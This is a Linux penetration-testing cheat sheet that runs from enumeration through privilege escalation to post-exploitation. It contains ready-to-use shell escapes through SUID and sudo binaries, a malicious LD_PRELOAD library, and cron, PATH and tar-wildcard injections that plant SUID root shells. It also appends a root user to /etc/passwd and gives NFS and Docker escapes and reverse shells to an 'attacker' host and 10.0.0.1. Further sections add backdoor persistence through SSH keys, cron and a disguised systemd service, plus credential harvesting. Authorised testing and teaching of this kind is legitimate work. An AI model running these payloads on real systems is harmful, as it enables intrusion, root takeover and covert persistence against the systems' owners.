This comprehensive guide covers Linux security assessment, from initial enumeration through post-exploitation. It synthesizes techniques for discovering vulnerabilities, escalating privileges, and maintaining access in Linux environments.

System Enumeration

Manual Enumeration

System Information

 
# Basic system information (all read-only; nothing here changes host state)
uname -a                    # Complete system information
cat /etc/issue             # Distribution info (login banner text; admins may have customised or emptied it)
cat /etc/*-release         # Distribution details (the glob also matches os-release and lsb-release where present)
hostnamectl                # Hostname and OS info (systemd utility; absent on non-systemd hosts)
cat /proc/version          # Kernel compilation info
 
 
# Hardware information (read-only; lscpu also reports the CPU architecture and feature flags)
lscpu                      # CPU architecture details
free -h                    # Memory information
df -h                      # Disk usage
lsblk                      # Block devices

User Enumeration

 
# Current user context
whoami                     # Current username
id                        # User ID and group memberships (groups such as docker or sudo are privilege boundaries in their own right — review them)
sudo -l                   # Sudo privileges (may prompt for a password; the query is typically recorded in the sudo/auth log)
 
 
# All users
cat /etc/passwd           # User accounts
cat /etc/shadow           # Password hashes (if readable — a shadow file readable by an unprivileged user is itself a hardening finding to report)
getent passwd             # All users including LDAP (or any other NSS source the host is configured with)
last                      # Login history (from the wtmp log, which may be rotated or absent)
w                         # Currently logged in users

Network Information

 
# Network configuration
ip a                      # IP addresses
ip route                  # Routing table
ss -tulpn                 # Socket statistics (the owning process is shown only for sockets the caller may inspect; root sees all)
netstat -antup           # All connections (net-tools; often absent on current distros — ss above is the iproute2 replacement)
 
 
# DNS and hosts
cat /etc/resolv.conf     # DNS servers (a 127.0.0.53 entry usually means systemd-resolved is proxying the real upstreams)
cat /etc/hosts           # Local host mappings

Process and Services

 
# Running processes
ps aux                   # All processes (other users' command lines are visible unless /proc is mounted with hidepid)
pstree                   # Process tree
 
 
# Services
# Only active units are listed; add --all to include inactive and failed ones
systemctl list-units --type=service --state=running

Scheduled Tasks

 
# System-wide cron jobs
cat /etc/crontab         # system crontab: the sixth field names the user each job runs as
ls -la /etc/cron.*       # the glob covers cron.d, cron.hourly, cron.daily, cron.weekly, cron.monthly (whichever exist)
 
 
# User cron jobs
crontab -l               # Current user
ls -la /var/spool/cron/crontabs/   # Debian-style spool path; other distros use /var/spool/cron, and listing it usually requires root
 
 
# Systemd timers (scheduled units that live outside cron; add --all to include inactive timers)
systemctl list-timers

Automated Enumeration Tools

LinPEAS

 
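# Download, then execute from disk (instead of piping the remote script straight into a shell),
# so the file can be inspected and checked against the release page before it runs.
curl -L -o linpeas.sh https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh

# Save output (this needs the script on disk — the pipe-to-sh form never leaves a file behind,
# so "./linpeas.sh" would not exist after it)
./linpeas.sh | tee linpeas_output.txt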

LinEnum

# Fetches the script from a moving branch (master) with no integrity check: download it once,
# review it, and run that pinned copy rather than re-fetching on every engagement
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh && ./LinEnum.sh -t   # -t selects LinEnum's thorough (slower) test set

pspy - Process Monitoring

 
# Monitor processes without root
# Assumes the pspy64 binary has already been copied to the host; it polls procfs and needs no elevated privileges
./pspy64 -f    # Monitor file system events
./pspy64 -p    # Monitor processes

Privilege Escalation Vectors

SUID/SGID Exploitation

Finding SUID Files

 
# Find SUID files
# -perm -4000 and -perm -u=s are two spellings of the same test (setuid bit set, other bits ignored);
# 2>/dev/null drops permission-denied noise from directories the current user cannot read
find / -type f -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
 
 
# Find both SUID and SGID
# The escaped parentheses group the -o (or) so that -type f applies to both alternatives
find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null

Common SUID Exploits

 
# Find command exploitation
find . -exec /bin/sh \; -quit
 
 
# Vim exploitation
vim -c ':!/bin/sh'
 
 
# Less exploitation
less /etc/profile
!/bin/sh
 
 
# AWK exploitation
awk 'BEGIN {system("/bin/sh")}'
 
 
# Perl exploitation
perl -e 'exec "/bin/sh";'

Sudo Exploitation

 
# Check sudo permissions
# Read-only; may prompt for the caller's password, and the query is typically recorded in the sudo/auth log
sudo -l
sudo -ll                  # long-format listing of the same rules
 
 
# Common sudo exploits (GTFOBins)
sudo vim -c ':!/bin/sh'
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find . -exec /bin/sh \; -quit
sudo python -c 'import os; os.system("/bin/sh")'

LD_PRELOAD Exploitation

 
# Create malicious shared library
echo 'void _init() {system("/bin/bash");}' > /tmp/pe.c
gcc -fPIC -shared -o /tmp/pe.so /tmp/pe.c -nostartfiles
sudo LD_PRELOAD=/tmp/pe.so program_name

Linux Capabilities

 
# Find files with capabilities
# Walks the whole filesystem; errors from unreadable paths are silenced. On a hardened host the
# list should be short and every entry explainable (cap_net_raw on ping is a common legitimate one)
getcap -r / 2>/dev/null
 
 
# Python with cap_setuid
python3 -c "import os; os.setuid(0); os.system('/bin/sh')"
 
 
# Perl with cap_setuid  
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/sh";'

Cron Job Exploitation

Enumeration

 
# System cron jobs (same read-only checks as the enumeration section; cron* also matches /etc/crontab itself)
cat /etc/crontab
ls -la /etc/cron*
 
 
# Monitor cron execution with pspy
# -f adds file-system events to the process events; -i 1000 sets the procfs scan interval in ms (per pspy's usage text)
./pspy64 -f -i 1000

Attack Vectors

Writable Script
 
# If cron runs a writable script
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cronjob.sh
PATH Manipulation
 
# Create malicious binary
cat > /tmp/ls << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
EOF
chmod +x /tmp/ls
export PATH=/tmp:$PATH
Wildcard Injection
 
# If cron uses wildcards (tar czf backup.tgz *)
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > shell.sh
chmod +x shell.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'

Kernel Exploits

 
# Check kernel version
# Compare against the distribution's patched package version, not only the upstream number:
# distro kernels backport fixes without changing the base version printed here
uname -r
cat /proc/version
 
 
# Common exploits
 
# DirtyCOW (CVE-2016-5195) - Kernel 2.6.22 < 3.9
 
# PwnKit (CVE-2021-4034) - PolicyKit
 
# Sudo Baron Samedit (CVE-2021-3156) - sudo < 1.9.5p2

Writable Files Exploitation

/etc/passwd Exploitation

 
# Generate password hash
openssl passwd -1 -salt hacker hacker123
 
# Add new root user
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:root:/root:/bin/bash' >> /etc/passwd

NFS Exploitation

 
# Check for NFS exports
showmount -e target      # read-only query of the export list; "target" is a placeholder host name
 
 
# No_root_squash exploitation
 
# On attacker (as root):
mount -t nfs target:/share /tmp/nfs
cp /bin/bash /tmp/nfs/shell
chmod +s /tmp/nfs/shell
 
# On target:
/share/shell -p

Docker Container Escape

 
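# Check if in container
ls -la /.dockerenv             # marker file Docker creates in its containers (absent under other runtimes, so a miss is not conclusive)
grep docker /proc/1/cgroup     # cgroup v1 paths name the docker scope; on cgroup v2 hosts the file is usually just "0::/" and this test is inconclusive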
 
 
# Docker group privilege escalation
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
 
 
# Privileged container escape
mount /dev/sda1 /mnt/host
chroot /mnt/host bash

Common Vulnerabilities

Path Hijacking

 
# Find programs using relative paths
strings /usr/bin/program | grep -E '^[a-z]+$'
 
 
# Create malicious binary
cat > /tmp/service << 'EOF'
#!/bin/bash
/bin/bash -p
EOF
chmod +x /tmp/service
 
 
# Hijack PATH
PATH=/tmp:$PATH /usr/bin/vulnerable_program

Wildcard Exploitation

 
# TAR wildcard exploitation
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > shell.sh
chmod +x shell.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'

Race Conditions

 
# Symbolic link race condition
while true; do
    ln -sf /etc/shadow /tmp/vulnerable_file
    ln -sf /tmp/my_file /tmp/vulnerable_file
done

Shell Techniques

Reverse Shells

Bash

bash -i >& /dev/tcp/attacker/4444 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Netcat

 
# Traditional netcat
nc -e /bin/sh attacker 4444
 
 
# Netcat without -e
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker 4444 >/tmp/f

Shell Stabilization

 
# Python TTY upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
 
# Ctrl-Z, then:
stty raw -echo; fg
 
# In shell:
reset

Persistence Mechanisms

SSH Key Persistence

 
# Generate SSH keys
ssh-keygen -t rsa -f /tmp/backdoor_key
 
 
# Add to authorized_keys
mkdir -p ~/.ssh
echo 'ssh-rsa AAAAB3NzaC1... backdoor@attacker' >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

Cron Job Persistence

 
# User crontab
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/4444 0>&1'") | crontab -
 
 
# System-wide cron
echo '* * * * * root nc attacker 4444 -e /bin/bash' > /etc/cron.d/backdoor

Systemd Service Persistence

cat > /etc/systemd/system/backdoor.service << 'EOF'
[Unit]
Description=System Monitoring Service
After=network.target
 
[Service]
Type=simple
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/attacker/4444 0>&1"
Restart=always
User=root
 
[Install]
WantedBy=multi-user.target
EOF
 
systemctl daemon-reload
systemctl enable backdoor.service

Post-Exploitation

Information Gathering

 
# Credential harvesting
find /home -name ".bash_history" 2>/dev/null
find / -name "wp-config.php" 2>/dev/null
grep -r "password" /etc 2>/dev/null | grep -v Binary
 
 
# Network mapping
arp -a
ip route
for port in {1..65535}; do
    timeout 1 bash -c "echo >/dev/tcp/target/$port" && echo "Port $port open"
done

Pivoting

 
# SSH port forwarding
ssh -L 8080:internal_target:80 user@jumphost
ssh -D 1080 user@target  # SOCKS proxy
 
 
# Socat relay
socat TCP-LISTEN:8080,fork TCP:target:80

Security Hardening

File Permissions

 
# Find world-writable files
# -perm -002 matches any file with the "other write" bit set; -type f excludes directories and symlinks,
# so world-writable directories (e.g. without the sticky bit) need a separate -type d pass
find / -perm -002 -type f 2>/dev/null
 
 
# Fix permissions
# NOTE(review): distributions ship different defaults for /etc/shadow (e.g. 0640 root:shadow on
# Debian-derived systems, where a setgid-shadow helper needs group read) — forcing 0600 can break
# password checks by unprivileged processes; confirm the distro's packaged default before tightening.
chmod 600 /etc/shadow
chmod 644 /etc/passwd      # passwd must stay world-readable: user/group name lookups by every process depend on it

Service Hardening

 
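# Disable unnecessary services
systemctl disable --now service_name   # --now also stops the running instance; disable alone only removes the boot-time link
systemctl mask service_name            # prevents the unit from being started again, even as a dependency

# Firewall configuration: set the policy and allow management access BEFORE enabling,
# otherwise a remote admin session is cut off the moment the default-deny policy takes effect
ufw default deny incoming
ufw allow ssh
ufw enable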

Quick Reference

One-Liner Enumeration

 
# System info
(hostname; id; uname -a; cat /etc/issue) 2>/dev/null
 
 
# SUID files
find / -perm -4000 -type f 2>/dev/null | head -20   # head truncates to the first 20 hits; drop it for a complete list
 
 
# Capabilities
getcap -r / 2>/dev/null

Quick Shells

 
# Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
 
 
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Essential Tools

| Tool | Purpose |
|---|---|
| LinPEAS | Comprehensive enumeration |
| GTFOBins | Binary exploitation reference |
| pspy | Process monitoring without root |
| Chisel | TCP/UDP tunneling |

Cross-References